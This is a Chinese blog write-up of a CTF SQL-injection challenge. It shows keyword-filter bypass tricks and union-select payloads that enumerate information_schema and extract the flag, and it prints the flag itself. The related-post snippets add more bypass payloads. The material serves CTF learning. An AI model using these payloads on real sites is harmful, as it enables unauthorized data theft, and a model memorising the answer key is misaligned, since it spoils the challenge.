简单的sql答案解析

最新推荐文章于 2022-05-16 10:58:06 发布
最新推荐文章于 2022-05-16 10:58:06 发布
阅读量248 收藏
点赞数 1
分类专栏: 实验吧

通过注入获得flag值(提交格式:flag{})。

解题链接: http://ctf5.shiyanbar.com/423/web/ 通过

答案:

flag{Y0u_@r3_5O_dAmn_90Od}

关键词被过滤:解决方法如下

1大小写交替: Order SeLect 

2.双写  : OderOrder SelectSelect 

3.交叉: selecselectt  

注释符被过滤,解决方法如下:

1.用 '号闭合  ,如having , where

详细资料摘录:ctf sql注入关键词绕过【积累中】

 

解析(摘自实验吧-web 简单的sql注入)步骤:

1.查询当前的数据库

‘++unionunion++all++selectselect++database()'

2.查询元数据库中的所有的表的名字

1%27++unionunion++selectselect++table_name++fromfrom++information_schema.tables++wherewhere++%271%27=%271

 where ’1=1用来构成语句同时屏蔽掉后面的‘,单行注释没用的时候可以这样做

ps:where 1=1 详解

where 1=1是sql语句条件逻辑判断表达式,由于1=1成立,恒为真,该表达式1=1将始终返回"真"。这种写法实际目的是为了获取逻辑值"True",其实诸如2=2, 1+2=3,'中'='中'等之类的写法都可以返回逻辑值"True",只不过1=1的运算开销更小,故被应用的最普遍。

下面例子将有助于理解有关概念:

1) select * from t1 where 1=1;
-- 实际等效于select * from t1 where true;
-- 语句将返回t1中所有的记录行

2) select * from t1 where 1<>1;
-- 实际等效于 select * from t1 where false;
-- 语句将返回空记录集

说明,例1)实际上等同于不加任何筛选条件,有些画蛇添足,where 1=1的实际意义不如where 1<>1来得有用,当我们只需要获取表的字段(结构)信息,而不需要理会实际保存的记录时,例2)的写法将是非常可去取的,因为系统仅会读取结构信息,而不会将具体的表记录读入内存中,这无疑节省了系统开销。

3.查询字段名

1' unionunion  selectselect  column_namcolumn_namee  fromfrom  information_schema.coluinformation_schema.columnsmns  wherewhere  table_name='flag

列出表名为flag的表的字段

information_schema.coluinformation_schema.columnsmns:这里采用了交叉绕 原为-->information_schema.columus

column_name(s) :数据库表中所有列的名称,column_name是一个列名称

ps:

information_schema数据库表说明:

SCHEMATA表:提供了当前mysql实例中所有数据库的信息。是show databases的结果取之此表。

TABLES表:提供了关于数据库中的表的信息(包括视图)。详细表述了某个表属于哪个schema,表类型,表引擎,创建时间等信息。是show tables from schemaname的结果取之此表。

COLUMNS表:提供了表中的列信息。详细表述了某张表的所有列以及每个列的信息。是show columns from schemaname.tablename的结果取之此表。

STATISTICS表:提供了关于表索引的信息。是show index from schemaname.tablename的结果取之此表。

USER_PRIVILEGES(用户权限)表:给出了关于全程权限的信息。该信息源自mysql.user授权表。是非标准表。

SCHEMA_PRIVILEGES(方案权限)表:给出了关于方案(数据库)权限的信息。该信息来自mysql.db授权表。是非标准表。

TABLE_PRIVILEGES(表权限)表:给出了关于表权限的信息。该信息源自mysql.tables_priv授权表。是非标准表。

COLUMN_PRIVILEGES(列权限)表:给出了关于列权限的信息。该信息源自mysql.columns_priv授权表。是非标准表。

CHARACTER_SETS(字符集)表:提供了mysql实例可用字符集的信息。是SHOW CHARACTER SET结果集取之此表。

COLLATIONS表:提供了关于各字符集的对照信息。

COLLATION_CHARACTER_SET_APPLICABILITY表:指明了可用于校对的字符集。这些列等效于SHOW COLLATION的前两个显示字段。

TABLE_CONSTRAINTS表:描述了存在约束的表。以及表的约束类型。

KEY_COLUMN_USAGE表:描述了具有约束的键列。

ROUTINES表:提供了关于存储子程序(存储程序和函数)的信息。此时,ROUTINES表不包含自定义函数(UDF)。名为“mysql.proc name”的列指明了对应于INFORMATION_SCHEMA.ROUTINES表的mysql.proc表列。

VIEWS表:给出了关于数据库中的视图的信息。需要有show views权限,否则无法查看视图信息。

TRIGGERS表:提供了关于触发程序的信息。必须有super权限才能查看该表

4.最后构造出

1'  unionunion  selectselect  flag  fromfrom  flag  wherewhere  '1'='1

从flag表中的flag字段中读取记录 

Ali]e
关注
  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
牛客网SQL答案解析--进阶3
Zzd608217的博客
11-22 1434
牛客网SQL答案解析--进阶3
sql注入空格被过滤_SQL注入:各种绕过检测的姿势
weixin_39874589的博客
11-16 4225
这一篇主要总结一下sqlilabs中advanced injection中的用到的各种绕过,也就是less21-less38。目录1)数据编码2)特殊字符、语法关键字过滤3)存储型注入4)特殊字符转义与宽字节注入5)防火墙保护与http参数污染数据编码http://111.231.88.117/sqli_lab/sqli-labs-php7/Less-21/ http://111.231.88.1...
[SWPUCTF 2021 新生赛]sql 关于sql的注入替换
qq_62046696的博客
05-16 2257
打开界面,看见参数是wllm,测试一下是否存在sql注入,首先?wllm=1回显正确,wllm=1'错误存在字符型注入,然后输入人?wllm='1 %23报错发现空格被掠过,然后%23是#的编码。 /**/是空格的一个格式,发现一共有三列 然后测试了一下,=号果不其然也被略过,like可以顶替等于号 构造? url=wllm=-1'union/**/1,group_concat(table_name),3/**/from/**/information_schema.tables/**/where/*
CISP-PTE维持记录(2022-03-30)
orange777
03-30 6920
0x00前言 初考CIST-PTE是在2019年,今天做了下维持,对其中的一些题目做下记录。其实这些题目基本上都是在网上可以找到的,其中标注的答案部分有极个别可能有误,请慎重! 这里说下题型分布,选择题40个,80分;实操题2个,20分。总分100,>=70即可拿证。下面开始吧 0x01选择题 1、()是最常用的公钥密码算法 (2分) A 量子密码B DSAC RSAD 椭圆曲线 2、通过修改HTTP Headers 中的哪个键值可以伪造来源网址() (2分) A User-AgentB Accept
SQL注入时当and、or等字符被过滤了怎么办
weixin_40950781的博客
08-25 1万+
SQL注入时and、or被过滤了怎么办当常用字符被注释无法使用时,通常采取以下方法(可自行搜索sql注入绕开过滤等):0x01字母被注释(or、and等)1. 大小写变形2. 改变编码3. 添加注释4. 往字符里面插入被过滤的字符(双写法)5.利用符号形式0x02数字被注释(1、2等)6. 使用浮点数0x03 符号注释(<、>等)7. 利用函数代替 当常用字符被注释无法使用时,通常采...
数据库中sql查询语句习题含的答案解析.doc
10-03
SQL查询语句是数据库...以上是针对给定习题中SQL查询语句的详细解析,每个查询都针对特定的数据检索需求,通过不同的SQL结构和联接操作实现。在实际数据库操作中,理解并熟练运用这些查询技巧对于数据管理至关重要。
SQL语句练习及答案
11-16
根据给定文件中的标题“SQL语句练习及答案”与描述“一个非常适合在笔试前看的SQL练习题。也可在在平时作为SQL语言练习题来使用”,我们可以看出这份材料主要包含了一系列针对SQL语言的练习题及其解答,适用于考前...
1.ocp1Z0-052.188答案解析 - 有目录
08-22
### OCP1Z0-052.188答案解析 #### 1. 查看展览并检查undo表空间的属性。 - **知识点**: 在Oracle数据库中,undo表空间是用于存储事务处理过程中未提交更改的数据。这部分内容讨论了如何查看undo表空间的属性,并...
sql语句强化练习习题及答案
05-23
### SQL语句强化练习知识点详解 #### 一、简单查询 **知识点1:查询所有学生信息** - **SQL语句**: `SELECT * FROM 学生;` - 这条语句用于查询`学生`表中的所有列和所有行。 **知识点2:查询特定条件下学生信息*...
最近三年计算机综合考研试题及答案解析
08-31
"最近三年计算机综合考研试题及答案解析"这个资源无疑是备考者们的重要参考资料,它涵盖了近三届计算机综合考研的全部试题以及详尽的答案解析。这些资料旨在帮助考生深入理解考试大纲,熟悉考试题型,提高解题能力,...
MySQL中表的字段信息查询--information_schema.COLUMNS
热门推荐
lkforce
03-14 2万+
MySQL的information_schema库中有个COLUMNS表,里面记录了mysql所有库中所有表的字段信息,该表信息如下: COLUMNS表的每一条记录都对应了数据库中某个表的某个字段,该表记录了如下信息:TABLE_CATALOGMySQL官方文档中说,这个字段值永远是def,但没写这个字段是干嘛用的。网上有把这个叫表限定符的,有叫登记目录的。作用疑似是和其他种类的数据库做区分。TA...
CTF解题笔记(3)
CODING...
01-10 5677
还是一个SQL注入的题目,以下使用SQLMAP爆破的方式以及手工注入的方式来解决这道题目:
为什么select * || flag from flag 不行呢?
wojiushilsy的博客
04-27 1581
首先*(星号)在SQL语句中有特殊的意义。应该是保留字或关键字 (没找到*(星号)属于什么) 。 所以你直接使用 select * || flag from flag 会报语法错误。 实验一: 这是一张表 查询语句 SELECT *||mpassword FROM rjqm.manager; 结果: 和查询语句 SELECT .||mpassword FROM rjqm.manager; 结果是...
python sql注入漏洞 ctf_CTF 中的 SQL 注入总结
weixin_39641334的博客
12-09 845
flag 常见表1select flag from flagSQL 注入的基本原理123select * from user where username='' and pass=''# 构造 username=devnull' or '1后,sql 语句变成select * from user where username='devnull' or '1' and pass=''SQLMap1p...
information_schema.columns字段说明,获取数据库表所有列信息
橙-极纪元-cplvfx-JJY.Cheng
08-29 2万+
转载:http://blog.sina.com.cn/s/blog_160965eee0102xx3k.html MySQL版本大于5.0时,有个默认数据库information_schema,里面存放着所有数据库的信息(比如表名、 列名、对应权限等),通过这个数据库,我们就可以跨库查询,爆表爆列。 获取所有列信息(COLUMNS) SELECT * FROM information_schema.COLUMNS WHERE TABLE_SCHEMA='数据库名'; COLUMNS表...
CTF之Sqli-Labs题目解析(1-11题)
a690135443的博客
06-14 1290
第一题 提示输入numeric类型的ID作为参数,尝试在url后添加?id=1查看,发现有显示。 改为?id=-1后无显示,也无报错,于是可以考虑-1空出位置后加union select爆数据。 改为?id=1'单引号报错,双引号不报错,可以推断出使用单引号闭合,加上注释之后,错误也消失了,所以可以在这个时候union select了。 然后添加order by语句,?id=1' order by 4 --+,当order by 4的时候报错,所以一共有3个字段。 然后使用unio
50道SQL经典习题与答案解析
alanmoneyman的博客
08-17 9078
50道SQL经典习题。题目来源自网络,SQL语句是自己写的,所有语句均在PostgreSQL进行了验证。不足之处,欢迎指正。
ctf /**/与双写 绕过sql过滤
qq_43943098的博客
07-11 3682
注意: 本博客可能转载了多处文章内容,所有转载内容均会标明出处,谢谢!! 0.在文章开始之前的话 本人也这是刚刚接触数据库这一块不过一周的时间,在此之前都是普通的码奴,所以对sql的命令或者语句有着错误的理解,请各位dalao海涵并在评论里指出。 1.浅谈我对sqlsql注入的理解 所谓sql,其原名是结构话查询语句,对于这个结构化我首先想到的是Linux里大部分的命令都带有的 -型的参数,再则...
HITCTF2018-web全题解
蚁景网安学院
02-07 2855
点击蓝字关注我们前记最近参加了一下哈工大办的HITCTF,感觉题目可以学到知识,于是分享一下我的题解~01PHPreading发现文件泄露http://198.13.58.35:8899...
SQL面试必备:精选试题与解析
"这篇资料包含了针对软件测试人员的SQL面试题目及答案,涵盖了查询、删除冗余信息和复杂条件匹配等知识点。" 在软件测试领域,掌握SQL语言是至关重要的,因为测试人员需要通过SQL来验证数据库中的数据是否正确,...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值